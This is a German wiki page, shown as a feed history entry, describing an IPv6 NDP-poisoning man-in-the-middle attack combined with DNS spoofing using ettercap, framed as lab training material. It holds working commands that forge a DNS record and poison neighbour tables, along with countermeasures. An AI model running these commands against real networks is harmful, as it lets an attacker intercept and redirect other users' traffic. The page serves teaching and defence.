https://wiki.ixheim.de/index.php?action=history&feed=atom&title=IPv6_NDP_plus_DNS_Spoofing_Ettercap 2026-06-28T22:07:58Z Versionsgeschichte dieser Seite in Xinux Wiki MediaWiki 1.35.1 https://wiki.ixheim.de/index.php?title=IPv6_NDP_plus_DNS_Spoofing_Ettercap&diff=65245&oldid=prev 2025-10-28T10:48:05Z

<p>Die Seite wurde neu angelegt: „= IPv6 Man-in-the-Middle Angriff mit DNS Spoofing = == Einleitung == Dieser Artikel beschreibt einen &#039;&#039;&#039;IPv6-basierten Man-in-the-Middle (MitM) Angriff&#039;&#039;&#039; mit…“</p> <p><b>Neue Seite</b></p><div>= IPv6 Man-in-the-Middle Angriff mit DNS Spoofing =<br /> <br /> == Einleitung ==<br /> Dieser Artikel beschreibt einen '''IPv6-basierten Man-in-the-Middle (MitM) Angriff''' mit DNS-Spoofing, der für Schulungszwecke in abgeschotteten Laboren eingesetzt werden kann. Der Angriff demonstriert die praktische Anwendung von '''NDP Poisoning''' (Neighbor Discovery Protocol) kombiniert mit DNS-Manipulation.<br /> <br /> == Voraussetzungen ==<br /> <br /> === Netzwerkkonfiguration ===<br /> * '''Angreifer''': 2003:a:32a:1799::3:1<br /> * '''Opfer''': 2003:a:32a:1799::2:1 <br /> * '''Gateway''': 2003:a:32a:1799::1<br /> * '''Zieldomain''': xinux.net<br /> <br /> === Benötigte Software ===<br /> *apt-get install ettercap-graphical<br /> <br /> == Konfiguration ==<br /> <br /> === DNS-Eintrag erstellen ===<br /> Der Angreifer konfiguriert einen gefälschten DNS-Eintrag:<br /> *echo -e &quot;xinux.net AAAA 2003:a:32a:1799::3:1&quot; &gt; /etc/ettercap/etter.dns<br /> <br /> === Variablen setzen ===<br /> *ANGREIFER=2003:a:32a:1799::3:1<br /> *OPFER=2003:a:32a:1799::2:1<br /> *GW=2003:a:32a:1799::1<br /> <br /> == Angriffsdurchführung ==<br /> <br /> === NDP Poisoning mit DNS Spoofing ===<br /> Der Angreifer startet den Man-in-the-Middle Angriff:<br /> *ettercap -Tq -i eth0 -M ndp -P dns_spoof //$OPFER/ //$GW/<br /> <br /> === Alternative: Bidirektionales Poisoning ===<br /> Für erweiterte Angriffe kann bidirektionales Poisoning eingesetzt werden:<br /> *ettercap -Tq -i eth0 -M ndp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//<br /> <br /> == Verifikation ==<br /> <br /> === Beim Opfer ===<br /> Das Opfer testet die DNS-Auflösung:<br /> *ping6 xinux.net<br /> Erwartete Antwort: PING xinux.net(2003:a:32a:1799::3:1)<br /> Tatsächliche IP: 94.130.248.215 (IPv4) oder 2a01:4f8:141:44a5::1337 (IPv6)<br /> <br /> === NDP-Tabelle prüfen ===<br /> *ip -6 neighbor show<br /> <br /> == Technische Erklärung ==<br /> <br /> === NDP Poisoning ===<br /> * Vergiftet die IPv6 Neighbor Discovery Protocol Tabellen<br /> * Der Angreifer gibt sich gegenüber dem Opfer als Gateway aus<br /> * Der Angreifer gibt sich gegenüber dem Gateway als Opfer aus<br /> <br /> === DNS Spoofing ===<br /> * Manipuliert DNS-AAAA-Anfragen (IPv6)<br /> * Leitet legitime Domains auf die IP des Angreifers um<br /> * Ermöglicht Abfangen und Modifizieren von Traffic<br /> <br /> == Gegenmaßnahmen ==<br /> <br /> * '''IPv6 RA Guard''': Router Advertisement Protection<br /> * '''SEcure Neighbor Discovery (SEND)''': Kryptografische Verifizierung<br /> * '''NDP Monitoring''': Überwachung anomaler NDP-Aktivitäten<br /> * '''DNS over TLS/HTTPS''': Verschlüsselte DNS-Abfragen<br /> <br /> == Siehe auch ==<br /> * [[IPv6 Security]]<br /> * [[Network Penetration Testing]]<br /> * [[DNS Security]]<br /> <br /> [[Kategorie:Netzwerksicherheit]]<br /> [[Kategorie:IPv6]]<br /> [[Kategorie:Penetration Testing]]</div>

Thomas.will